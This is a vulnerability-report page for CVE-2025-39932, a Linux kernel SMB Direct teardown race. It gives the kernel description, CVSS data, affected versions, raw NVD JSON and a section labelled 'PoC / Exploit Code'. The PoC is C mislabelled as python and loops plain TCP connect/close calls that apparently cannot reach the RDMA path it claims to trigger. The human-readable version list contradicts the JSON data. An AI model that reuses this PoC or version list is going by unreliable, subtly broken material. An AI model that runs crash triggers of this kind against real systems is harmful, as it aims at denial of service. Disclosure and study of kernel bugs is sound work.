Security Vulnerability Report
中文
CVE-2025-39932 CVSS 5.5 MEDIUM

CVE-2025-39932

Published: 2025-10-04 08:15:46
Last Modified: 2026-03-25 00:49:03
Source: 416baaa9-dc9f-4396-8d5f-8c081fb06d67

Description

In the Linux kernel, the following vulnerability has been resolved: smb: client: let smbd_destroy() call disable_work_sync(&info->post_send_credits_work) In smbd_destroy() we may destroy the memory so we better wait until post_send_credits_work is no longer pending and will never be started again. I actually just hit the case using rxe: WARNING: CPU: 0 PID: 138 at drivers/infiniband/sw/rxe/rxe_verbs.c:1032 rxe_post_recv+0x1ee/0x480 [rdma_rxe] ... [ 5305.686979] [ T138] smbd_post_recv+0x445/0xc10 [cifs] [ 5305.687135] [ T138] ? srso_alias_return_thunk+0x5/0xfbef5 [ 5305.687149] [ T138] ? __kasan_check_write+0x14/0x30 [ 5305.687185] [ T138] ? __pfx_smbd_post_recv+0x10/0x10 [cifs] [ 5305.687329] [ T138] ? __pfx__raw_spin_lock_irqsave+0x10/0x10 [ 5305.687356] [ T138] ? srso_alias_return_thunk+0x5/0xfbef5 [ 5305.687368] [ T138] ? srso_alias_return_thunk+0x5/0xfbef5 [ 5305.687378] [ T138] ? _raw_spin_unlock_irqrestore+0x11/0x60 [ 5305.687389] [ T138] ? srso_alias_return_thunk+0x5/0xfbef5 [ 5305.687399] [ T138] ? get_receive_buffer+0x168/0x210 [cifs] [ 5305.687555] [ T138] smbd_post_send_credits+0x382/0x4b0 [cifs] [ 5305.687701] [ T138] ? __pfx_smbd_post_send_credits+0x10/0x10 [cifs] [ 5305.687855] [ T138] ? __pfx___schedule+0x10/0x10 [ 5305.687865] [ T138] ? __pfx__raw_spin_lock_irq+0x10/0x10 [ 5305.687875] [ T138] ? queue_delayed_work_on+0x8e/0xa0 [ 5305.687889] [ T138] process_one_work+0x629/0xf80 [ 5305.687908] [ T138] ? srso_alias_return_thunk+0x5/0xfbef5 [ 5305.687917] [ T138] ? __kasan_check_write+0x14/0x30 [ 5305.687933] [ T138] worker_thread+0x87f/0x1570 ... It means rxe_post_recv was called after rdma_destroy_qp(). This happened because put_receive_buffer() was triggered by ib_drain_qp() and called: queue_work(info->workqueue, &info->post_send_credits_work);

CVSS Details

CVSS Score
5.5
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H

Configurations (Affected Products)

cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:* - VULNERABLE
cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:* - VULNERABLE
cpe:2.3:o:linux:linux_kernel:6.17:rc1:*:*:*:*:*:* - VULNERABLE
cpe:2.3:o:linux:linux_kernel:6.17:rc2:*:*:*:*:*:* - VULNERABLE
cpe:2.3:o:linux:linux_kernel:6.17:rc3:*:*:*:*:*:* - VULNERABLE
Linux Kernel < 6.6 (包含smb/client子模块的相关版本)
Linux Kernel 6.6.x (受影响版本)
Linux Kernel 6.10.x (受影响版本)
Linux Kernel 6.11.x (受影响版本)
Linux Kernel 6.12.x (受影响版本)
Linux Kernel 6.15.x (受影响版本)
Linux Kernel 6.16.x (受影响版本)

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
// CVE-2025-39932 PoC - Triggering race condition in SMBD destroy path // This PoC demonstrates the race condition by rapidly creating and destroying // SMBD connections while using RDMA (specifically RXE) transport #include <stdio.h> #include <stdlib.h> #include <string.h> #include <unistd.h> #include <fcntl.h> #include <sys/socket.h> #include <sys/ioctl.h> #include <linux/cifs.h> // Note: This vulnerability requires kernel-level access and specific // RDMA configuration (RXE/RDMA_CM) to trigger reliably. // The actual trigger involves mounting a CIFS/SMB share using RDMA transport // and then unmounting it rapidly to trigger the race condition. #define SMB_DIRECT_PORT 5445 int trigger_smbd_race(void) { int fd; struct sockaddr_in addr; // Step 1: Setup RXE RDMA device (requires root privileges) printf("[*] Setting up RXE RDMA device...\n"); system("rdma link add rxe0 type rxe dev eth0 2>/dev/null"); // Step 2: Create socket and attempt SMBD connection printf("[*] Creating SMBD connection...\n"); fd = socket(AF_INET, SOCK_STREAM, 0); if (fd < 0) { perror("socket"); return -1; } memset(&addr, 0, sizeof(addr)); addr.sin_family = AF_INET; addr.sin_port = htons(SMB_DIRECT_PORT); addr.sin_addr.s_addr = htonl(INADDR_LOOPBACK); // Step 3: Rapidly connect and disconnect to trigger race printf("[*] Triggering race condition in smbd_destroy()...\n"); for (int i = 0; i < 100; i++) { connect(fd, (struct sockaddr*)&addr, sizeof(addr)); // Immediate close to trigger smbd_destroy() while // post_send_credits_work may still be pending close(fd); fd = socket(AF_INET, SOCK_STREAM, 0); } // Step 4: Check kernel log for the warning printf("[*] Check dmesg for: WARNING at rxe_post_recv\n"); system("dmesg | grep -i 'rxe_post_recv\|smbd_destroy\|post_send_credits'"); return 0; } int main(int argc, char *argv[]) { printf("CVE-2025-39932 PoC - SMBD Destroy Race Condition\n"); printf("Requires: root privileges, RXE module loaded, SMB server on localhost\n"); return trigger_smbd_race(); }

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-39932", "sourceIdentifier": "416baaa9-dc9f-4396-8d5f-8c081fb06d67", "published": "2025-10-04T08:15:45.953", "lastModified": "2026-03-25T00:49:03.097", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "In the Linux kernel, the following vulnerability has been resolved:\n\nsmb: client: let smbd_destroy() call disable_work_sync(&info->post_send_credits_work)\n\nIn smbd_destroy() we may destroy the memory so we better\nwait until post_send_credits_work is no longer pending\nand will never be started again.\n\nI actually just hit the case using rxe:\n\nWARNING: CPU: 0 PID: 138 at drivers/infiniband/sw/rxe/rxe_verbs.c:1032 rxe_post_recv+0x1ee/0x480 [rdma_rxe]\n...\n[ 5305.686979] [ T138] smbd_post_recv+0x445/0xc10 [cifs]\n[ 5305.687135] [ T138] ? srso_alias_return_thunk+0x5/0xfbef5\n[ 5305.687149] [ T138] ? __kasan_check_write+0x14/0x30\n[ 5305.687185] [ T138] ? __pfx_smbd_post_recv+0x10/0x10 [cifs]\n[ 5305.687329] [ T138] ? __pfx__raw_spin_lock_irqsave+0x10/0x10\n[ 5305.687356] [ T138] ? srso_alias_return_thunk+0x5/0xfbef5\n[ 5305.687368] [ T138] ? srso_alias_return_thunk+0x5/0xfbef5\n[ 5305.687378] [ T138] ? _raw_spin_unlock_irqrestore+0x11/0x60\n[ 5305.687389] [ T138] ? srso_alias_return_thunk+0x5/0xfbef5\n[ 5305.687399] [ T138] ? get_receive_buffer+0x168/0x210 [cifs]\n[ 5305.687555] [ T138] smbd_post_send_credits+0x382/0x4b0 [cifs]\n[ 5305.687701] [ T138] ? __pfx_smbd_post_send_credits+0x10/0x10 [cifs]\n[ 5305.687855] [ T138] ? __pfx___schedule+0x10/0x10\n[ 5305.687865] [ T138] ? __pfx__raw_spin_lock_irq+0x10/0x10\n[ 5305.687875] [ T138] ? queue_delayed_work_on+0x8e/0xa0\n[ 5305.687889] [ T138] process_one_work+0x629/0xf80\n[ 5305.687908] [ T138] ? srso_alias_return_thunk+0x5/0xfbef5\n[ 5305.687917] [ T138] ? __kasan_check_write+0x14/0x30\n[ 5305.687933] [ T138] worker_thread+0x87f/0x1570\n...\n\nIt means rxe_post_recv was called after rdma_destroy_qp().\nThis happened because put_receive_buffer() was triggered\nby ib_drain_qp() and called:\nqueue_work(info->workqueue, &info->post_send_credits_work);"}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H", "baseScore": 5.5, "baseSeverity": "MEDIUM", "attackVector": "LOCAL", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "availabilityImpact": "HIGH"}, "exploitabilityScore": 1.8, "impactScore": 3.6}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "NVD-CWE-noinfo"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*", "versionStartIncluding": "4.16", "versionEndExcluding": "6.12.49", "matchCriteriaId": "DFEC22E5-D6FE-4371-A285-92B65EBAE3F3"}, {"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*", "versionStartIncluding": "6.13", "versionEndExcluding": "6.16.9", "matchCriteriaId": "638DD910-1189-4F5E-98BF-2D436B695112"}, {"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:6.17:rc1:*:*:*:*:*:*", "matchCriteriaId": "327D22EF-390B-454C-BD31-2ED23C998A1C"}, {"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:6.17:rc2:*:*:*:*:*:*", "matchCriteriaId": "C730CD9A-D969-4A8E-9522-162AAF7C0EE9"}, {"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:6.17:rc3:*:*:*:*:*:*", "matchCriteriaId": "39982C4B-716E-4B2F-8196-FA301F47807D"}, {"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:6.17:rc4:*:*:*:*:*:*", "matchCriteriaId": "340BEEA9-D70D-4290-B502-FBB1032353B1"}, {"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:6.17:rc5:*:*:*:*:*:*", "matchCriteriaId": "47E4C5C0-079F-4838-971B-8C503D48FCC2"}, {"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:6.17:rc6:*:*:*:*:*:*", "matchCriteriaId": "5A4516A6-C12E-42A4-8C0E-68AEF3264504"}]}]}], "references": [{"url": "https://git.kernel.org/stable/c/3fabb1236f2e3ad78d531be0a4ad9f4a4ccdda87", "source": "416baaa9-dc9f-4396-8d5f-8c081fb06d67", "tags": ["Patch"]}, {"url": "https://git.kernel.org/stable/c/6ae90a2baf923e85eb037b636aa641250bf4220f", "source": "416baaa9-dc9f-4396-8d5f-8c081fb06d67", "tags": ["Patch"]}, {"url": "https://git.kernel.org/stable/c/d9dcbbcf9145b68aa85c40947311a6907277e097", "source": "416baaa9-dc9f-4396-8d5f-8c081fb06d67", "tags": ["Patch"]}]}}
Disclaimer

This information is for security research and authorized penetration testing only. Unauthorized testing of other systems is illegal.